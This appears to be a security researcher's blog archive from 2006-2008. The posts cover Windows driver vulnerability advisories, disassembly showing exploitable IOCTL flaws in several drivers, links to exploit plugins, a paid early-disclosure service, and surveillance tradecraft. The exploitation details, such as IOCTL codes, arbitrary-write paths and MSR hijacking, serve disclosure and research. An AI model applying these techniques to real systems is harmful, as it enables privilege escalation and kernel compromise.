(Wednesday, 12 March 2008) Written by Rubén
I have just added some stuff to the kartoffel's site. Patch for minor bugs in kartoffel.exe and kartolib.lib Fortinet Forticlient 3.0.465 fortimon.sys k-plugin exploit. (A public exploit has been released so...) Video "Norman Antivirus vs Embedded pointers detection k-plugins" (VMware Codec). http://kartoffel.reversemode.com/downloads.php

Breaking Gmail's Audio Captcha.
(Thursday, 06 March 2008) Written by Rubén
We are inaugurating the blog at Wintercore. The first post you can read is " Breaking Gmail's Audio Captcha ". Hope you find it interesting. http://blog.wintercore.com A week ago I came across this interesting post at the Websense blog, anyway I guess everybody is already aware that a bot was spotted breaking Gmail’s image captcha. According to the post, the success rate is about 20%, which from spammers point of view is really profitable and sure more than enough for its purposes. However what caught my attention, while reviewing the gmail signup page, was the Audio Captcha. First off, it’s worth noting the “cat&dog” Asirra captcha from Microsoft Research, that’s a really good captcha, has kept the success rate of those who tried to break it (computer vision gurus) below of 60%. Why? I think the problem with most of the captchas is that are using a complex solution to show so simple challenges: obfuscated, deformed and distorted image to represent short alphanumeric sequences. On the other hand we have the “cat&dog” style Captchas that implement a simple solution to show a really complex challenge for automated agents: Are you seeing cat or dogs in this perfectly clean picture?. A question too hard to answer if you are not human. Read more...

The month that came in from the cold.
(Wednesday, 13 February 2008) Written by Rubén
Hi there, It seems that there has been inactivity on the site, so sorry!. To compensate, special offer today: 3x1. 1. Wintercore presents the real proactive Computer Vision Based Anti-Phishing Engine - ARTICA -. We have been hardly working on this engine and today the first beta sees the light. We are proud :) ARTICA is the first anti-phishing engine based on Computer Vision techniques which guarantees by definition its proactivity. ARTICA emulates the natural human behaviour plus the common logic a security researcher uses to apply while detecting phishing webpages. All the process is carried out without any manual interaction. To sum up: whatever you see, Artica sees it as well. A picture is worth a thousand words. This technology poses a step forward in the automation of phishing detecion, deprecating other reactive url-based methods. This brings us powerful novel capabilities i.e we can automatically identify the entity that is being impersonated. Therefore this engine offers a valuable help to those Companies that need to automate the phishing detection. In order to achieve the best performance and introduce the novel concepts the engine involves we are announcing a public Call For Testers . This program is restricted to companies and/or institutions. All the information is available at http://www.wintercore.com Time to talk about the february advisories. 2.Microsoft Word Memory Corruption Vulnerability Microsoft Word 2003 is prone to a memory corruption vulnerability while parsing a specially crafted Word file. The vulnerability is caused by calculation errors while parsing certain fields within the barely documented, File Information Block (FIB). This could lead to remote arbitrary code execution in the context of the user who started the application. Microsoft has addressed this issue (among others) in its february bulletin: http://www.microsoft.com/technet/security/Bulletin/MS08-009.mspx Disclosure Timeline: 07/02/2007 - Vendor Contacted 07/02/2007 - Vendor Acknowledged 01/10/2008 - Vendor confirms vulnerability and plans to fix it. 02/12/2008 - Coordinated disclosure 3. Fortinet FortiClient Local Privilege Escalation. Fortinet Endpoint Solution For Enterprise, FortiClient is prone to a local privilege escalation due to the improper device filtering carried out by its filter driver, fortimon.sys . The driver affected filters certain devices, enabling pass-through filtering. However, its own Device's DeviceExtension is not correclty initialized so any logged user could force the kernel to operate with user-mode controlled memory just by direclty issuing a special request to the driver's device. This leads to local arbitrary code execution in the context of the kernel. Even Guest users can elevate privileges to SYSTEM. This issue has been addressed in the following releases: + FortiClient 3.0 MR5 Patch 4 + FortiClient 3.0 MR6 Affected versions: + FortiClient 3.0 MR5 Patch 3 and lower Users can consult the patches via http://docs.forticare.com/firmware.xml Fortinet Advisory: http://kc.forticare.com/default.asp?id=3618 Disclosure Timeline: 01/18/2008 - Vendor Contacted 01/18/2008 - Vendor Acknowledged 01/29/2008 - Vendor confirms vulnerability and plans to fix it. 02/13/2008 - Coordinated disclosure

Exploiting WDM Audio Drivers.(updated)
(Thursday, 20 December 2007) Written by Rubén
The paper has been revised and updated (01/07/2008). The last paper of the year :) Download "Exploiting WDM Audio Drivers" v 1.01 Download K-Plugin for Kartoffel: WDM Drivers checker + es1371mp.sys Exploit Happy Winter Solstice and happy holidays. See you next year.

Reversemode's 2nd birthday
(Saturday, 24 November 2007) Written by Rubén
Today but two years ago, I registered reversemode.com having uncertain purposes in my mind. 24 months later I do "Reversemode" for a living. To be honest I never expected such a situation so I would like to thank those companies that, despite I was ( I am actually ) a completely unknown researcher within the IT security industry, trust in me. Blah, blah, blah...the paragraph above is enough non-technical content for a post so let's talk about interesting issues. I've already got in my hands the book titled Advanced Windows Debugging .Below is my brief review. WinDbg (*d) is the most powerful debugger ever. Nevertheless, under my point of view, there is a lack of a well-structured repository of documentation. You can read commands, tricks ,tutorials...on the web however, there is nothing similar to a centralized reference. Advanced Windows Debugging addresses (AWD from now on) this issue. This book is a brilliant reference for developers and researchers who use windbg on a daily basis. AWD is mainly oriented towards user-mode debugging rather than kernel, explaining in detail how to identify and deal with common software problems such as memory corruptions, leaks, RPC... It's worth noting that AWD is not a security book strictly speaking. I mean its content are not directly related with exploits or something like that but the book explains pretty well how to correctly debug Windows Core Components, which is important while identifying/elaborating vulnerabilities. AWD is for an intermediate/advanced public so a decent knowledge of Windows internals is highly recommended. Perhaps the only thing I've missed is a chapter about kernel debugging :/ . Anyway, a well-written book highly recommended if you are either a researcher or a developer. Btw, a paper titled "Exploiting Windows Audio Drivers" will be published in the next few days. This paper covers a novel method for elevating privileges by taking advantage of a Windows design weakness in addition to third-party insecure audio drivers. A couple of tools related will be also released. Stay tuned. On November Apple and Trendmicro fixed some vulnerabilities reported by Reversemode, if you need further information take a look at "Advisories" section.

Symantec warns of local privilege escalation 0Day in Windows. Busted.
(Wednesday, 17 October 2007) Written by Rubén
Securityfocus/bugtraq readers : The first email sent to bugtraq contains an important ERRATA( duplicated code ). Symantec researcher Elia Florio has warned, at the company's weblog ,of a 0day attack in Windows XP and 2003 that allows unprivileged users to gain SYSTEM privileges via a buggy driver installed by default. In his/her post, Elia brings us an important clue:" At the moment, it’s still not clear how the driver is used by Windows because this file does not have the typical Microsoft file properties present in other Windows system files ". Such a file is not common so looking for this sort of .sys we come across a couple of them. One of those drivers is secdrv.sys , which is developed by Macrovision as part of SafeDisc. Mario Ballano ( 48bits.com ) and I have been taking a look at the driver and quickly found this interesting piece of code. .text:00015E2C cmp [ebp+ var_10 ] , 0CA002813h .text:00015E33 jz short loc_15E69 As you can see the IOCTL is METHOD_NEITHER which is a potential vulnerability by itself (few drivers are correctly handling this method). Let's see whether this time is different... .text:00015ED9 call dword ptr [eax+ 10h ] ; Internal Dispatcher .text:00015EDC mov [ebp+ var_1C ] , eax .text:00015EDF cmp [ebp+ var_1C ] , 0Ah .text:00015EE3 jz short loc_15EFC .text:00015EE5 mov eax , [ebp+ arg_4 ] .text:00015EE8 mov dword ptr [eax] , 0C0000001h .text:00015EEE mov eax , [ebp+ arg_4 ] .text:00015EF1 and dword ptr [eax+ 4 ] , 0 .text:00015EF5 mov eax , 0C0000001h .text:00015EFA jmp short loc_15F21 .text:00015EFC ; --------------------------------------------------------------------------- .text:00015EFC .text:00015EFC loc_15EFC: ; CODE XREF: sub_15E12+D1j .text:00015EFC mov ecx , [ebp+ var_4 ] .text:00015EFF mov esi , [ebp+ var_C ] .text:00015F02 mov eax , [ebp+ arg_0 ] .text:00015F05 mov edi , [eax+ 3Ch ] ; Output Buffer (Irp-> UserBuffer) .text:00015F08 mov eax , ecx ; Inline memcpy .text:00015F0A shr ecx , 2 .text:00015F0D rep movsd .text:00015F0F mov ecx , eax .text:00015F11 and ecx , 3 .text:00015F14 rep movsb No luck. As you can see the buffer supplied by the user is not properly checked so you can overwrite any address you wish, even kernel addresses. The first 4 DWORDs of the input buffer are copied into the output buffer without any further validation. However,there is restriction: InputBuffer[1] should be a fixed value in order to reach this piece of code. No problem. Take a look at the exploit code. The driver copies bytes into the output buffer but also into the input buffer so both need to be sanitized. I've released a K-plugin for kartoffel that exploits this flaw on Windows XP SP2 and 2003 (32-bit) Download at http://kartoffel.reversemode.com/downloads.php .(New video added) This K-plugin can only be used for personal study and research purposes. Do not email me requesting shellcodes, customized exploit or something like that. Despite there is no patch available, at the momment, we are disclosing this information since an exploit has been caught in the wild so we see no reason to hide information that can be useful for administrators and researchers. References: http://www.symantec.com/enterprise/security_response/weblog/2007/10/privilege_escalation_exploit_i.html http://www.macrovision.com http://blog.48bits.com/?p=172 (castilian)

Another 3rd party flaw to step into Vista Kernel.
(Monday, 01 October 2007) Written by Rubén
First off, if you haven't read yet the quite brilliant skywing's paper about PatchGuard 3 on the latest uninformed, check it out .Btw, his blog ( http://www.nynaeve.net ) is another jewel. So talking about Vista, recently I came across a nice freeware program, called Speedfan , that allows controlling some thermal capabilities of your hardware. It contains a signed driver for Vista x64 so... well, you know ... There is a big flaw as you can see below( deja vu , see Joanna's IsGameOver() - NVIDIA nTune Driver vulnerability) IOCTL : 0x9c40243C cmp dword ptr [rdx+8], 8 jb short loc_11171 cmp dword ptr [rdx+10h], 0Ch jb short loc_11171 mov r8d, [rsi+4] ; InputBuffer[1] mov r9d, [rsi+8] ; InputBuffer[2] mov rax, r8 shl rax, 20h or rax, r9 mov rdx, rax shr rdx, 20h mov ecx, [rsi] ; InputBuffer[0] wrmsr You can overwrite (or read) any MSR you want, so hijacking the LSTAR we open the kingdom's door.Therefore, this flaw allows to load unsigned drivers on Vista x64 and do whatever misdeed your broken mind had planned. Afaik there is no public exploit that uses the method explained on the Joanna's paper (I was unable to to grab purplepill so let me know if I am wrong) so I've prepared a K-plugin for kartoffel (64-bit) that exploits this issue. However, since MSR hooking is a widely known rootkit technique don't expect to find out nothing really exciting.Look out! it's intented for study and/or research purposes only so I'm not responsible in any manner for any illegal use. Download at http://kartoffel.reversemode.com/downloads.php I guess that sooner than later Microsoft will revoke the certificate for this buggy driver, anyway the driver is going to be fixed quickly, maybe even today according to its author, so it's not a major problem. You can check the status of this bug at any time since it is publicily available through the bugtracker at http://www.bugtrack.almico.com/view.php?id=987 . Btw,once the patch is out,I'll release an advisory for this issue with more technical details so stay tuned.

Reversemode Premium Disclosure
(Monday, 17 September 2007) Written by Rubén
Corporate post this time. Reversemode launches the Premium Disclosure service for legal companies only . Executive Overview What does “Premium Disclosure” mean? Reversemode follows a responsible disclosure whenever a new vulnerability is discovered. It basically means that the vendor is contacted prior to any public disclosure. Once the vendor has addressed the flaw according to its own policy, we release a public advisory with some technical details with the aim of helping researchers understand the real impact of the vulnerability. On the other hand, those customers who are subscribed to our “Premium Disclosure” service receive full technical details, including comprehensive reports, private exploits and/or tools related, at the same time the vendor is notified. Vulnerabilities As a customer of the Premium Disclosure service you receive vulnerabilities affecting Microsoft Windows Vista/XP/2003/2K and other leading products as well. The basic pack for a vulnerability comprises of the following items: +Comprehensive paper explaining the flaw. Available in the following languages: English, Deutsch, Castellano. +Exploit/PoC and/or tools related. +Up-to-day information about the status of the vulnerability and how the vendor is planning to address the issue. Advantages of Premium Disclosure Your company gets informed months before the vulnerability will be publicily disclosed, therefore you can: + Improve your IPS/IDS engine, signatures or security products. + Protect your corporate enviroment. + Study novel techniques. + Boost the success rate of your penetration tests. Contact If you are interested in this service and/or need further information, do not hesitate to contact us. http://corporate.reversemode.com – http://www.reversemode.com contact (at) reversemode (dot) com [email concealed] Download Executive Overview "Reversemode Premium Disclosure"

Achtung, die warme kartoffel!
(Sunday, 02 September 2007) Written by Rubén
The summer is over :/ Kartoffel 1.3 is now public. This version, available for 32 and 64 bits, includes a lot of new features. If you were one of those who had enough courage to play with the initial release, you'll notice important changes. I have set up a dedicated site for this application where you can download all the stuff, read the news,documentation... http://kartoffel.reversemode.com Download this video ( VMware codec ) to see Kartoffel spotting a couple of bugs in Norman AV and the old Compuware DbgMsg.sys. Please note that the I have not contacted to Norman AV since I was unable to find any security contact neither at its website nor at the OSVDB's Vendor Dictionary .In addition to the lack of contacts you should see how Norman addresses security bugs by reading this advisory advisory .No comments. I do responsible disclosure with responsible vendors only. Anyway, the details about the bugs are really minimal since I don't like this sort of situations in which end-users are put at (low) risk. Btw, this advisory was pending since August: Download Advisory " CheckPoint ZoneLabs - Zone Alarm Vsdatant.sys multiple local privilege escalation vulnerabilities"

New advisory
(Wednesday, 18 July 2007) Written by Rubén
The vendor "sponsoring" (note the irony, we all know the Microsoft's public policy about reporting vulnerabilities...) the advisory in July is... Microsoft. There is nothing really important to say about this issue. The flaw is another boring buffer overflow. You can read the technical details in the advisory. It's worth noting that Microsoft didn't release any security bulletin for this vulnerability. I'm still wondering why, at this point it's just a rhetorical question though. Anyway, if some visitor has any clue please let me know. Update Due to the feedback I've received: As far as I know Microsoft has not released any public advisory/note/warning about this flaw ( I don't know the reason so better ask Microsoft ), however the flaw has been patched according to its statements. This flaw has proven to be remotely exploitable with minimal user interaction. Download Advisory "Microsoft DirectX RLE Compressed Targa Image File Heap Overflow"

Exploiting Common Flaws in Drivers
(Wednesday, 11 July 2007) Written by Rubén
Introduction The number of vulnerabilities in drivers has dramatically increased, i.e Reversemode has publicily disclosed approximately 10 advisories related with drivers vulnerabilities in the previous 12 months [1]. Despite of the fact that there are various resources on drivers exploiting [2] [3] [4] [5], there is still a lack of documentation about how to exploit an arbitrary kernel address overwrite. Even though this is the most common flaw, sometimes it is not clear whether or not the flaw may allow arbitrary code execution within the kernel context. Anyway,if you manage to modify even just one bit at a controlled kernel address,likely you will have the chance to elaborate the proper path in order to execute your own ring0 code. This paper discusses our approach for exploiting common device driver flaws. This is the initial release for the paper, it will be updated to add additional methods. This paper does not contain any vulnerability but just exploiting techniques. Download "Exploiting Common Flaws in Drivers"

Spies wear Black Hat (II)
(Tuesday, 19 June 2007) Written by Rubén
Worth reading: The Athens Affair Hi! first of all: No advisory this month. We continue the second part of Spies wear Black Hat . In the first part we talked about the basic measures for countersurveillance (in a very simplistic manner). This time, we are going to introduce some concepts on mobile targets,cars... it is globally called "mobile surveillance" and of course, "mobile countersurveillance". Let's focus on vehicles surveillance. There are different kinds of well-known methods, one of the most famous is the Floating Box, widely used by FBI and agencies.You can read a lot of nice information about this complex method googling so no more time for it. Instead of that, we will explain another method called "three man convoy". To carry out this kind of surveillance it is needed, at least, three vehicles. In addition to that, any other external support is highly recommend.First of all, those three vehicles should be connected by RF devices in order to communicate any event whilst carrying out the surveillance. The first team's vehicle is known as the "eyeball", although it must keep the distance, it is the car that is closer to the target than any other. Behind this, we find the "Back up" car, and finally the third car that comes into play is the "Tail End Charlie"(T.E.C) . These positions need to be changed in order to prevent being easily noticed. For example, the eyeball, after an interval of ten minutes becomes the T.E.C and vice versa...These changes are known as "Handsover" and should be carried out whenever the surveillance is at stake, i.e the target is carrying out some type of counter-surveillance like quick and unexpected changes in direction or when the targets suddenly stops, maybe alerted by a suspicious behaviour. Let's see an example: Figure 1. Surveillance convoy at Champs-Élysées avenue.Paris. As we can see in the figure 1, we have the "T" target stopped at a junction. The "eyeball" is identified by E, the "back up" is denoted by B and finally the "TEC" is C. This time is a good chance for carrying out a handsover since the target has stopped by whatever. Now E finds out a good place to wait ( C ) till the TEC passes near around . Thus, the new convoy order is B being the "back up",E being the "eyeball" car and finally C becoming the TEC. Figure 2. Convoy carrying out the Handsover. What about the counter-surveillance in these cases?, well it is quite complex. You need means, you need A LOT of means.Well, maybe I'm wrong and you are the new John Nash and you can discover complex patterns while driving at 70mph, if so please let me know !! It's worth noting that driving at 70 mph or so, your field of vision narrows from 180º to 40º ,approximately. I have developed (a couple of hours ago,so don't expect too much...)a very simplistic simulation of a software for uncovering this type of mobile surveillances. Despite of the fact that you'll need a satellite for your personal use, everything it's ok :) . Well, I mean that it's not impossible but actually quite complex. This simulation assumes that you are receiving data in realtime from various sources, which are the vehicles moving around your target/reference point.Data can be obtained using a computer vision approach.There are hundres of papers on traffic flow measuring so I am not talking about anything new. First of all, this app generates gaussian random traffic flow, then clustering this flow using K-means algorithm, proly Expectation-Maximization should bring us more accuracy to the results...We define 3 clusters, one for the TEC, another for the Backup and the last for the eyeball. Then, we choose the following features: Euclidean Distance: This measurement is the means of the euclidean distance between a car and another car within different cluster for a time variable. Why? We are assuming that the convoy maintains a security distance between convoy's vehicles. It should be enough in order to avoid being noticed but also enough to avoid losing contact. A threshold is also defined. Surveillance Interval : Time in seconds since the car was recognized near around our target and therefore added into the database of the tracking system. We assume that the surveillance convoy's uptime correlates. A threshold is defined. Cluster : It is ideal since each convoy's vehicle lies within a different cluster. In a real software, this could be accomplished developing a SVM or a NN based on these and additional features. Once a suitable convoy has been found: Then the app monitorizes the activity of the convoy looking for a handsover as we could see below. If a handsover is being carried out, the program warns the user. Download "Three-man surveillance convoy Simulation"

Kartoffel dissapeared?
(Saturday, 19 May 2007) Written by Rubén
I have received some feedback about why kartoffel download is no longer available. The main reason is that the version 1.0 was a sh** and it didn't work very well. Despite of this fact it was able to spot some flaws. So Kartoffel has grown up during this time,it's mostly rewritten and a lot of minor bugs (and not so minor) have been fixed. Please note that Kartoffel is intented as a tool for the driver developer community, it's not a point-and-click-and-send-me-an-email-when-it-crashes fuzzer. New features in v1.3 ( Vista/XP/2k/2003 ): + Ring0 Memory Disassembler + Ring0 Memory Dumper + Display Driver object + Display Device security access rights. + SDK for building plugins in order to inject complex data into buffers. + Write or Read directly from/to a device,pipe... + FSCTL support + Load/Unload Drivers ... [ Kartoffel 1.3 ] Secure your driver Ruben Santamarta - www.reversemode.com Usage: -s --symbolicDos \\.\Example -d --device \Device\example -z --fuzzsizeinput Min,Max -Z --fuzzsizeoutput Min,Max -n --inputsize Size (DWORD aligned) -o --outputsize Size (DWORD aligned) -u --fuzzinput METHOD,SUBMETHOD -U --fuzzoutput METHOD,SUBMETHOD -I --fuzzioctl Min,Max -b --FillInput FILE -B --FillOutput FILE -c --checkDeadlock Timeout (miliseconds) -q --loaddriver FILE,NameofService -w --(d)iscarddriver NameofService -H --(S)howDrvObj \Device\name -K --(K)ernelMem KernelAddress(Hex) -L --(D)isassemble KernelAddress(Hex) -S --Synchronous (default overlapped) -p --listdevices -r --listdrivers -x --internalinfo -v --VerifyType3overwrites -g --FSCTL -W --(U)seWriteFile -R --(u)seReadFile -A --(C)reatePnpUser -D --(R)emovePnpUser -P --(P)npConsole (ALPHA!!) So far, this version is not public and is only available for driver developers upon request ( ruben (at) reversemode (dot) com ). Probably in a couple of months the public version will be released free for all.

May Day
(Monday, 07 May 2007) Written by Rubén
Updated VMware has released an update for this advisory, adding ESX branch to the affected products. Btw, the initial advisory I released had a wrong CVE number, now is fixed. Thanks to Steven M. Christey for pointing this out. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1069 alehop! Finally, the advisory I introduced in April is going to be released in May. Btw,no more advisories are expected to release this month. Just open this post to provide the download link of the VMware advisory. Later on, I hope to add some stuff to this post or add another one along May but now busy, busy, busy... Download Advisory "VMware Products - GPF Denial of Service"

The phone is off or out of coverage.
(Saturday, 21 April 2007) Written by Rubén
Hi there! During the past year 2006 I was reviewing dozens of drivers from the leading anti-virus companies. You can see the final outcome of this project in the section "Advisories" which should be a bad indicator. Watch out, I am not suggesting that "xxxxx" anti-virus is better than "yyyy" or something like that. My project was focused on a very specific area and the results cannot/shouldn't be extrapolated. Whenever a driver allows to unprivileged users to gain Ring0 access, it reachs an "insecurity coefficient" of 5 automatically or automagically (Mario Ballano's language ; ) ). If your driver implements routines which allow unprivileged users to grab confidential information or are a high-risk potential factors by themselves your coefficient is going to be close to 10. If your driver got 10, you should be re-engineering the driver instead of patching it (under my lame point of view). It's said that an image is worth a thousands words. Please note that I've not released any advisory for McAfee, yes it was a matter of time. Before McAfee Security Suite 2007, the older version of its Personal Firewall, which had the device MPFIREWALL, was prone to multiple local privilege escalation vulnerabilities. In April I am going to release a couple of advisories. The first one is a "seriously?-another-one?" flaw in a security software driver. Download Advisory "CheckPoint ZoneLabs - ZoneAlarm SRESCAN local privilege escalation" In the next few days I'll release a rare and interesting advisory, stay tuned. Congratulations Ra! Ok , I'm really proud of my sister! She is already a Doctor in Physics. After doing a quite hard work of years at Desy she has finally defended her thesis. For the guys of ESA and NASA who visit this page, you should take into account her profile :)! For particle physics fans: Download thesis "Measurements of the exclusive production of a real photon with the ZEUS detector at HERA II"

Spies wear Black Hat (I)
(Tuesday, 27 March 2007) Written by Rubén
Insiders are an important threat to take into account, actually they are behind of a high percent of attacks suffered by companies. Networks and computers are being strongly protected against trojan infections,bots,worms,exploits and backdoors. Nevertheless, often while developing security policies,the countermeasures for detecting physical and electronic (not based on software) surveillance finally lie in a dirty,dark and sad forgotten corner.That's not ok. Let's see briefly some notes on domestic and corporate countersurveillance measures. From a corporate standpoint Primary Threat: Industrial Espionage Goal : Neutralize any attempt to leak confidential information. Have you ever think that your meeting room can be monitorized while you are presenting your new-and-brilliant-idea which is worth its weight in gold?. There is neither anti-virus nor IDS which can detect it. + Maybe you are looking for a simple hidden microphone under a table. Well,it's not a big deal, take a look deeply at the room and you will catch it. + Maybe you are looking for a more sophisticated device inside a wall or covered by a portrait. No problem, you should use a non-linear junction (semiconductors,metals...) detector. This kind of devices can detect most of the commercial bugs. + Maybe you are looking for a high-tech RF,phiber optic or infra-red transmitter (not freely available for any person) device which becomes invisible for non-linear junction detectors. In those cases,RF locators, thermal or infra-red cameras are going to be your best friends. Ok, now your meeting room is free of bugs or at least it looks like. What about your phone line? If your line has been tapped physically, a reflectometer should spot serial or parallel bugs. Depends on the accuracy of the reflectometer you could also detect induction tappings which are not breaking the line so this kind of devices (aka "snuffle bugs") are the most difficult to detect. Good! now your meeting is a bug free zone and you've got a clean phone access. Watch out... the window! There are laser microphones which basically can grab a conversation firing its laser beam at the window and then the reflected beam carries the vibrations produced by the sound waves. So that it can uncover any conversation that is taking part in the room. There are several solutions, customized crystals or paints, or just a meeting room without windows :) Cool! your meeting room is free of bugs,bugged lines and has no windows. But a room is a room,so it has at least 4 walls. There are electronics microphones which can easily listen through a wall. It is a weird possibility but possible indeed. From a domestic standpoint Previous devices we have been talking about use to be very expensive since it's a professional equipment. People should not have to fortify their kitchen against a neighbor who is spying you trying to steal your secret for a tasty turkey stuff.However we are not safe at all. Far for be conspiranoics and being a realistic person there are documented cases of hidden cameras in hotels rooms, workers being observed without legal consent or thinks like that... For those cases there are hundreds of little and cheap devices that detect RF emitters. It's a good solution. However, my suggestion is that if you are curious about this kind of things you should acquire an scanner. My scanner is an Icom IC-R3. In the european version there are not banned frequencies, unfortunately american version has some bands banned. This scanner has a novel feature, a color display. So you can visualize most of wireless cams available on the market or your favorite TV Channel. The image you are seeing on the left is a shop with a wireless (Wideband FM) security hidden cam installed I discovered some time ago. To be continue...

Working like a doozer
(Monday, 19 March 2007) Written by Rubén
Hi! Coming back in March with a couple of flaws within Apple and Microsoft products. I hope that this year I'll stay releasing an advisory,at least, every month. Firstly, a boring heap corruption in Quicktime. Just one comment: I have uninstalled Quicktime long time ago. If you care about your integrity, you should get rid of it. Download Advisory "Apple Quicktime - ColorID table heap corruption" Second, a funny flaw in a microsoft driver, not very usual indeed. I have named it "IRQL escalation". Download Advisory "Microsoft Windows - Ndistapi.sys IRQL escalation" See you in April..

February advisories.
(Friday, 02 February 2007) Written by Rubén
02/07/2007 Updated to add Download Advisory "Trend Micro Products - Multiple local privilege escalation vulnerabilities" Hi all,new month so new post... Intel has recently released new versions of PRO Wireless Drivers. Some of these drivers were affected by a local kernel heap corruption vulnerability I found past summer. The severity of that flaw was very low, in addition the bug was mitigated by a proper ACL (not very usual indeed). In fact, Intel did not consider enough severity level to release a security advisory so the flaw has been silently fixed. Anyway, this is an explanation of that flaw. Taking w29n51.sys (9.0.4.17) as scapegoat (results can be extrapolated to others drivers). This driver registers itself as NDIS Miniport.It registers the proper device and a DosDevice using the NDIS library. .text:00011789 push offset aDeviceCx2ioctl ; "\\Device\\CX2IOCTL" .text:0001178E lea eax, [ebp+var_10] .text:00011791 push eax .text:00011792 call ds:NdisInitUnicodeString .text:00011798 push offset aDosdevicesCx2i ; "\\DosDevices\\CX2IOCTL" .text:0001179D lea ecx, [ebp+var_18] .text:000117A0 push ecx .text:000117A1 call ds:NdisInitUnicodeString .text:000117A7 mov edx, [ebp+arg_4] .text:000117AA push edx .text:000117AB push offset dword_21CED4 .text:000117B0 lea eax, [ebp+var_88] .text:000117B6 push eax .text:000117B7 lea ecx, [ebp+var_18] .text:000117BA push ecx .text:000117BB lea edx, [ebp+var_10] .text:000117BE push edx .text:000117BF mov eax, [ebp+arg_0] .text:000117C2 push eax .text:000117C3 call ds:NdisMRegisterDevice The flaw is located within the NDIS QueryInformation Handlers (OID...) Dispatch Routine: .text:000118F1 loc_118F1: ; CODE XREF: sub_118B0+35#j .text:000118F1 mov edx, [ebp+arg_0] ;our IOCTL .text:000118F4 mov [ebp+var_10], edx .text:000118F7 mov eax, [ebp+var_10] .text:000118FA sub eax, offset a1f60043e0e10a0 ; "1F60043E0E10A046E92F49" .text:000118FF mov [ebp+var_10], eax .text:00011902 cmp [ebp+var_10], 14h .text:00011906 ja loc_119DC .text:0001190C mov ecx, [ebp+var_10] .text:0001190F movzx edx, ds:byte_11A10[ecx] .text:00011916 jmp ds:off_119F4[edx4] The offset a1f60043e0e10a0 ; "1F60043E0E10A046E92F49" is 0x0012E000 (.rdata section, odd! ).Anyway, the IOCTL we must use is 0x0012E014. text:00011BB7 loc_11BB7: ; CODE XREF: sub_11B66+45#j .text:00011BB7 push offset aDcqueryproseto ; "dcQueryProSetOidFromIoctl" .text:00011BBC mov eax, [ebp+arg_0] .text:00011BBF add eax, 475BDCh .text:00011BC4 push eax ; int .text:00011BC5 call sub_15490 .text:00011BCA mov ecx, [ebp+arg_8] .text:00011BCD push ecx ; size_t => InputBuffer Length .text:00011BCE mov edx, [ebp+var_14] .text:00011BD1 add edx, 4 < InputBuffer [IOM] .text:00011BD5 mov eax, [ebp+arg_0] .text:00011BD8 add eax, 475AD9h .text:00011BDD push eax ; void => Pool.sizeof(InputBuffer) [DRIVER] .text:00011BDE call memcpy .text:00011BE3 add esp, 0Ch The previous code is copying,from the buffer allocated by the IOM, to memory allocated by the driver. .text:00011BE6 lea ecx, [ebp+var_10] .text:00011BE9 push ecx .text:00011BEA mov edx, [ebp+arg_14] .text:00011BED push edx .text:00011BEE mov eax, [ebp+arg_10] .text:00011BF1 push eax .text:00011BF2 mov ecx, [ebp+arg_0] .text:00011BF5 add ecx, 475AD9h .text:00011BFB push ecx .text:00011BFC mov edx, [ebp+var_4] .text:00011BFF push edx .text:00011C00 mov eax, [ebp+arg_0] .text:00011C03 push eax .text:00011C04 call sub_22578 OutputBuffer Lenght .text:00011C10 mov edx, [ebp+arg_0] .text:00011C13 add edx, 475AD9h .text:00011C19 push edx ; void * => Pool.sizeof(InputBuffer) [DRIVER] .text:00011C1A mov eax, [ebp+var_C] .text:00011C1D add eax, 8 < *(InputBuffer+8) [IOM] .text:00011C21 call memcpy .text:00011C26 add esp, 0Ch So we can overwrite 8 bytes of the adjacent pool header with one controlled value being the another one mostly predictable, let's see: nt!_POOL_HEADER +0x000 PreviousSize : Pos 0, 9 Bits +0x000 PoolIndex : Pos 9, 7 Bits +0x002 BlockSize : Pos 0, 9 Bits +0x002 PoolType : Pos 9, 7 Bits +0x000 Ulong1 : Uint4B // Controlled +0x004 ProcessBilled : Ptr32 _EPROCESS // Adjacent pool header . +0x004 PoolTag : Uint4B +0x004 AllocatorBackTraceIndex : Uint2B +0x006 PoolTagHash : Uint2B The following picture shows the process: As we can see, if OutputBuffer Lenght > InputBuffer Lenght, arbitrary Pool memory will be accessed during memcpy #2, however no more memory will be overwritten since IOM allocates the max amount between InputBuffer and OutputBuffer for METHOD_BUFFERED IRPs. Stay tuned for upcoming February advisories...

soon...
(Wednesday, 10 January 2007) Written by Rubén
Red pill - inside Matrix Blue pill - outside Matrix Dark pill - destroy Matrix I am counting the days till the iPhone arrives at Europe. I want it right now ! See Steve Jobs showing off iPhone's features and iPhone in action. http://events.apple.com.edgesuite.net/j47d52oo/event/ Watch out for the " AppleGoo " moment while Google CEO is talking. The future? ;)

My last exploit of the year (reloaded)
(Wednesday, 27 December 2006) Written by Rubén
Updated The new year is coming... I have been taking a look at the NtRaiseHardError bug and just for fun I've coded an exploit. Watch out, not for the double free vulnerability (indeed I have not analyzed that piece of code yet) but just relying on NtRaiseHardError internals and how is dispatched a MessageBox with MB_SERVICE_NOTIFICATION parameter enabled... And the oscar goes to..." Unprivileged users " by " we can crash the machine or even read the entire csrss.exe process memory ". Why? Because csrss.exe is not validating the user's parameters and then we can use a messagebox as a container for its own memory. Congratulations!. Hey! Don't forget to buy, buy, buy, and buy these days. The world will be better. Exploit (For educational purposes only - No modifications allowed) Download Exploit (in C) For those researchers who are interested in the Csrss Double-Free vulnerability, I have coded an arbitrary DWORD overwrite exploit. This flaw is hard to exploit (at least for me) due to the the "fail-and-die" situation. Corrupting the heap in a process like Csrss is dangerous. However, by definition a double-free is exploitable and I was curious about this flaw.So, "suddenly" the memory disclosure flaw I've demonstrated few days ago has become very useful for the exploiting process. In order to exploit this flaw successfully, we need...luck :). Well, among other things. Firstly, we should seed the heap with a "magic value", then corrupting the head with a specially crafted MessageBox we are going to overwrite various controlled addresses. Some of those addresses may be overwritten with an address of a Csrss heap chunk.Thus, using the memory disclosure exploit we can spot that chunk address which brings us the key for locating our shellcode and/or specially crafted data in memory. This exploit is not... A privilege escalation exploit. It does not contain any type of shellcode. An stable exploit. The heap around Csrss.exe is barely controllable so likely the exploit is not going to work well every time you run it.Patience.The chances for success grow up if you plan to run the exploit on a machine which had been running for several minutes or hours since the system is going to be more stable then (Vmware snapshots fit perfectly). This exploit is... A code that overwrites various controlled DWORDs in winsrv.dll data section within Csrss.exe process. If you are planning to exploit this issue for learning, you can code two different programs extracting routines from this exploit: the "corrupter" and the "csrss memory monitor". In this case, manual analysis is better. If you are reading this text and know how to exploit this issue in a better way, please contact me, I would be pleased to talk (and learn) about your method. Anyway,since the situation is quite volatile, the exploit is just intended for demonstrating the theory. Tested on XP 